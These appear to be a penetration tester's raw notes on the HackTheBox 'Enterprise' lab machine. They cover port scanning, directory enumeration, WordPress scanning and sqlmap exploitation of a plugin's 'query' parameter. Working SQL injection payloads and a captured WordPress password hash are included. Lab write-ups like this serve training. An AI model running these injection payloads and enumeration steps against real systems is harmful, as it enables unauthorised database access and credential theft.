Machine-Name  :  Enterprise
IP-Address    :  10.129.1.81

Command-Line: nmap -p- -T4 -A 10.129.1.81
Result:
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-15 10:39 EDT
    Nmap scan report for enterprise.htb (10.129.1.81)
    Host is up (0.050s latency).
    Not shown: 65529 closed ports
    PORT      STATE    SERVICE  VERSION
    22/tcp    open     ssh      OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA)
    |   256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA)
    |_  256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (ED25519)
    80/tcp    open     http     Apache httpd 2.4.10 ((Debian))
    |_http-generator: WordPress 4.8.1
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: USS Enterprise &#8211; Ships Log
    443/tcp   open     ssl/http Apache httpd 2.4.25 ((Ubuntu))
    |_http-server-header: Apache/2.4.25 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    | ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK
    | Not valid before: 2017-08-25T10:35:14
    |_Not valid after:  2017-09-24T10:35:14
    |_ssl-date: TLS randomness does not represent time
    | tls-alpn:
    |_  http/1.1
    5355/tcp  filtered llmnr
    8080/tcp  open     http     Apache httpd 2.4.10 ((Debian))
    |_http-generator: Joomla! - Open Source Content Management
    |_http-open-proxy: Proxy might be redirecting requests
    | http-robots.txt: 15 disallowed entries
    | /joomla/administrator/ /administrator/ /bin/ /cache/
    | /cli/ /components/ /includes/ /installation/ /language/
    |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
    |_http-server-header: Apache/2.4.10 (Debian)
    |_http-title: Home
    32812/tcp open     unknown
    | fingerprint-strings:
    |   GenericLines, GetRequest, HTTPOptions:
    |     _______ _______ ______ _______
    |     |_____| |_____/ |______
    |     |_____ |_____ | | | _ ______|
    |     Welcome to the Library Computer Access and Retrieval System
    |     Enter Bridge Access Code:
    |     Invalid Code
    |     Terminating Console
    |   NULL:
    |     _______ _______ ______ _______
    |     |_____| |_____/ |______
    |     |_____ |_____ | | | _ ______|
    |     Welcome to the Library Computer Access and Retrieval System
    |_    Enter Bridge Access Code:
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port32812-TCP:V=7.91%I=7%D=3/15%Time=604F71CA%P=x86_64-pc-linux-gnu%r(N
    SF:ULL,ED,"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
    SF:x20\x20_______\x20_______\x20\x20______\x20_______\n\x20\x20\x20\x20\x2
    SF:0\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x
    SF:20\x20\|_____\|\x20\|_____/\x20\|______\n\x20\x20\x20\x20\x20\x20\x20\x
    SF:20\x20\x20\|_____\x20\|_____\x20\x20\|\x20\x20\x20\x20\x20\|\x20\|\x20\
    SF:x20\x20\x20\\_\x20______\|\n\nWelcome\x20to\x20the\x20Library\x20Comput
    SF:er\x20Access\x20and\x20Retrieval\x20System\n\nEnter\x20Bridge\x20Access
    SF:\x20Code:\x20\n")%r(GenericLines,110,"\n\x20\x20\x20\x20\x20\x20\x20\x2
    SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______\x
    SF:20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x
    SF:20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______\n
    SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\x2
    SF:0\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x20
    SF:to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Syste
    SF:m\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermina
    SF:ting\x20Console\n\n")%r(GetRequest,110,"\n\x20\x20\x20\x20\x20\x20\x20\
    SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______
    SF:\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20
    SF:\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______
    SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\
    SF:x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x
    SF:20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Sys
    SF:tem\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermi
    SF:nating\x20Console\n\n")%r(HTTPOptions,110,"\n\x20\x20\x20\x20\x20\x20\x
    SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20___
    SF:___\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\
    SF:x20\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|___
    SF:___\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20
    SF:\|\x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcom
    SF:e\x20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20
    SF:System\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTe
    SF:rminating\x20Console\n\n");
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.12 seconds


Notes: Noticed the SSL certificate. Taking a look at the information.
SSL-Certicate-Info:
    enterprise.local
    jeanlucpicard@enterprise.local


Command-Line: sudo ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ph,txt -f -t 50 -u https://10.129.1.81
Result:
    /home/kali/HackingTools/dirsearch/thirdparty/requests/__init__.py:91: RequestsDependencyWarning: urllib3 (1.26.2) or chardet (4.0.0) doesn't match a supported version!
      warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "

      _|. _ _  _  _  _ _|_    v0.4.1
     (_||| _) (/_(_|| (_| )

    Extensions: ph, txt | HTTP method: GET | Threads: 50 | Wordlist size: 882080

    Error Log: /home/kali/HackingTools/dirsearch/logs/errors-21-03-17_17-05-02.log

    Target: https://10.129.1.81/

    Output File: /home/kali/HackingTools/dirsearch/reports/10.129.1.81/_21-03-17_17-05-02.txt

    [17:05:02] Starting:
    [17:05:05] 403 -  293B  - /icons/
    [17:05:05] 301 -  312B  - /files  ->  https://10.129.1.81/files/
    [17:05:05] 200 -  941B  - /files/

Browser: https://10.129.1.81/files
Notes: Downloaded and unzipped lcars.zip
Result:
    /lcars



Command-Line: ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,txt -f -t 50 -u http://10.129.1.81
Result:
      _|. _ _  _  _  _ _|_    v0.4.1
     (_||| _) (/_(_|| (_| )

    Extensions: php, txt | HTTP method: GET | Threads: 50 | Wordlist size: 882080

    Error Log: /home/kali/HackingTools/dirsearch/logs/errors-21-03-17_19-09-04.log

    Target: http://10.129.1.81/

    Output File: /home/kali/HackingTools/dirsearch/reports/10.129.1.81/_21-03-17_19-09-04.txt

    Can't write reports to /home/kali/HackingTools/dirsearch/reports/10.129.1.81
    ┌──(kali㉿kali)-[~/HackingTools/dirsearch]
    └─$ ./dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,txt -f -t 50 -u http://enterprise.htb

      _|. _ _  _  _  _ _|_    v0.4.1
     (_||| _) (/_(_|| (_| )

    Extensions: php, txt | HTTP method: GET | Threads: 50 | Wordlist size: 882080

    Error Log: /home/kali/HackingTools/dirsearch/logs/errors-21-03-17_19-09-32.log

    Target: http://enterprise.htb/

    Output File: /home/kali/HackingTools/dirsearch/reports/enterprise.htb/_21-03-17_19-09-34.txt

    [19:09:34] Starting:
    [19:09:34] 301 -    0B  - /index.php  ->  http://enterprise.htb/
    [19:09:36] 403 -  295B  - /icons/
    [19:09:39] 200 -    0B  - /wp-content/
    [19:09:39] 301 -  321B  - /wp-content  ->  http://enterprise.htb/wp-content/
    [19:09:43] 200 -    2KB - /wp-login.php
    [19:09:46] 200 -   19KB - /license.txt
    [19:09:48] 301 -  322B  - /wp-includes  ->  http://enterprise.htb/wp-includes/
    [19:09:48] 403 -  301B  - /wp-includes/



Command-Line: wpscan -e p,t,u,tt --url http://10.129.1.81
Result:
    /wp-scan.log

Notes: Found name "william-riker". http://10.129.1.81/xmlrpc.php

Browser: http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php
Result: Failed to read query

Browser: http://enterprise.htb/wp-content/plugins/lcars/lcars_db.php?query=1
Result:  Catchable fatal error: Object of class mysqli_result could not be converted to string in /var/www/html/wp-content/plugins/lcars/lcars_db.php on line 16
Notes: Using MySQL.

Notes: Sent previous browser URL to BurpSuite. Sent to Repeater. Copy to File. /home/kale/HTB/Machines/Enterprise_NF/lcars_db.req.
Command-Line: sqlmap -r lcars_db.req --dbms mysql
Notes: sqlmap -r <request> --dbms <DataBaseManagementSystem>
Result:
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.5.2#stable}
    |_ -| . ["]     | .'| . |
    |___|_  [,]_|_|_|__,|  _|
          |_|V...       |_|   http://sqlmap.org

    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting @ 18:17:43 /2021-03-17/

    [18:17:43] [INFO] parsing HTTP request from 'lcars_db.req'
    [18:17:43] [INFO] testing connection to the target URL
    [18:17:45] [INFO] testing if the target URL content is stable
    [18:17:45] [INFO] target URL content is stable
    [18:17:45] [INFO] testing if GET parameter 'query' is dynamic
    [18:17:45] [WARNING] GET parameter 'query' does not appear to be dynamic
    [18:17:45] [WARNING] heuristic (basic) test shows that GET parameter 'query' might not be injectable
    [18:17:45] [INFO] testing for SQL injection on GET parameter 'query'
    [18:17:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
    [18:17:46] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
    [18:17:47] [INFO] GET parameter 'query' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --string="error")
    [18:17:47] [INFO] testing 'Generic inline queries'
    [18:17:47] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
    [18:17:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
    [18:17:47] [WARNING] time-based comparison requires larger statistical model, please wait............ (done)
    [18:17:59] [INFO] GET parameter 'query' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
    for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
    [18:18:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
    [18:18:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
    [18:18:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
    [18:18:22] [INFO] target URL appears to have 1 column in query
    do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] y
    [18:18:29] [INFO] target URL appears to be UNION injectable with 1 columns
    [18:18:29] [INFO] checking if the injection point on GET parameter 'query' is a false positive
    GET parameter 'query' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
    sqlmap identified the following injection point(s) with a total of 72 HTTP(s) requests:
    ---
    Parameter: query (GET)
        Type: boolean-based blind
        Title: Boolean-based blind - Parameter replace (original value)
        Payload: query=(SELECT (CASE WHEN (1956=1956) THEN 1 ELSE (SELECT 7060 UNION SELECT 8073) END))

        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: query=1 AND (SELECT 1215 FROM (SELECT(SLEEP(5)))FDTq)
    ---
    [18:18:37] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8 (jessie)
    web application technology: Apache 2.4.10, PHP 5.6.31
    back-end DBMS: MySQL >= 5.0.12
    [18:18:38] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/enterprise.htb'

    [*] ending @ 18:18:38 /2021-03-17/




william.riker@enterprise.htb:$P$BFf47EOgXrJB3ozBRZkjYcleng2Q.2.
